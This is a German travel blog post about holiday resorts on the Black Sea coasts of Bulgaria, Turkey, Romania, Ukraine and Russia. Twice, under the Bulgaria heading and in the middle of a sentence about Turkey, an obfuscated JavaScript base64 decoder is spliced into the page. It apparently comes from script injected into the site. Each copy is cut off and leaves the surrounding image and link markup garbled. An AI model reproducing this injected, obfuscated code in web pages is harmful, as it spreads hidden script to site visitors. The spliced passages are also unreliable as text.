Urlaub am Schwarzen Meer

Das Schwarze Meer ist als Urlaubsgebiet sehr beliebt. In Deutschland sind besonders die Urlaubsregionen in Bulgarien und der Türkei bekannt und beliebt. Doch auch die anderen Länder, die sich um das Schwarze Meer verteilen, haben sehenswerte Erholungsgebiete. Da man für einen Urlaub in Bulgarien, Rumänien, Türkei und Ukraine kein Visum benötigt, ist ein Urlaub in diesen Ländern sehr unproblematisch. Für die russischen Urlaubsorte am Schwarzen Meer benötigt man allerdings ein Visum. Nähere Informationen für eine russisches Urlaubsvisum haben wir hier zusammengefasst.

Urlaubsorte am Schwarzen Meer: Bulgarien

function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfand_schwarzes_meer_bulgarien.jpg" alt="Der Goldstrand in Bulgarien" height="450" width="600">Goldstrand in Bulgarien (Foto: © JJ / marinda.de)

Bulgarien ist sehr beliebt bei deutschen Touristen. Diese schätzen die Gastfreundschaft der Bulgaren, das günstige Essen und das angenehme Klima. Die beliebtesten und bekanntesten Urlaubsregionen in Bulgarien sind der Goldstrand und der Sonnenstrand. In der Regel fliegt landet man auf dem Flughafen in Varna oder Burgas und wird dann mit einem Bus in sein Hotel gebracht.

Gute und aktuelle Angebote für einen Bulgarienurlaub gibt es z.B. bei ab-in-den-urlaub.de oder Expedia.de.

Urlaubsorte am Schwarzen Meer: Türkei

Die meisten Deutschen kennen die Mittelmeerküste der function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfand Türkei">Türkei. Dort liegen die bekannten Urlaubshochburgen Antalya, Alanya und Bodrum. Die Schwarzmeerküste der Türkei ist dagegen eher ein Geheimtipp. Von Istanbul bis Trabzon gibt es zahlreiche Orte mit kilometerlangen Stränden, die bisher touristisch eher wenig erschlossen sind. Tipps sind auf jeden Fall Sile und Amasra, die schöne Badestrände haben.

IstanbulIstanbul hat auch schöne Strände am Schwarzen Meer (Foto: © JJ / marinda.de)

Urlaubsorte am Schwarzen Meer: Rumänien

Die rumänische Schwarzmeerküste erstreckt sich über 245 Kilometer. Der größte und wichtigste rumänische Badeort ist Mamaia. Er liegt nördlich von Constanta und hat einen acht Kilometer langen Badestrand mit feinem weißen Sand.
Südlich von Constanta liegt Eforie Nord, der erste und älteste Kurort Rumäniens. Er liegt auf einer Landverbindung zwischen dem Techirghio-See und dem Schwarzen Meer. In den Sommermonaten ist der Ort sehr belebt. Weitere bekannte Badeorte an der rumänischen Küste sind Neptun, Jupiter, Saturn, Venus und Olimp.

Urlaubsorte am Schwarzen Meer: Ukraine

Die Ukraine ist in 2 Stunden mit dem Flugzeug aus Deutschland zu erreichen und vor allem durch die Halbinsel Krim als Urlaubsziel bekannt. Auf der Krim ist vor allem die Badeorte Jalta, Sewastopol, Jewpatorija, Feodossija, Aluschta und Sudak hervorzuheben. Auch die Hafenstadt Odessa hat einige schöne Badestrände und Sehenswürdigkeiten.

Urlaubsorte am Schwarzen Meer: Russland

Die russische Schwarzmeerküste erstreckt sich vom Fluss Psou im südlichen Osten bis nach Tusla im Nordwesten. Bekannte Bade- und Kurorte entlang der mehr als 450 kilometerlangen Küste sind u.a. Anapa, Sochi und Tuapse. Die Landschaft ist sehr abwechslungsreich und es gibt viel zu entdecken.

Tipp: Entlang der russischen Schwarzmeerküste fahren Express-Züge, mit denen man die Küstenlandschaft entdecken kann.

Hinterlasse jetzt einen Kommentar

Kommentar hinterlassen

E-Mail Adresse wird nicht veröffentlicht.


*


This Blog will give regular Commentators DoFollow Status. Implemented from IT Blögg